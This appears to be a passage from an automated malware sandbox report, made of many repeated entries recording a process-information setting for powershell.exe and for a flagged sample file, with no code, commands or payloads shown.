                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
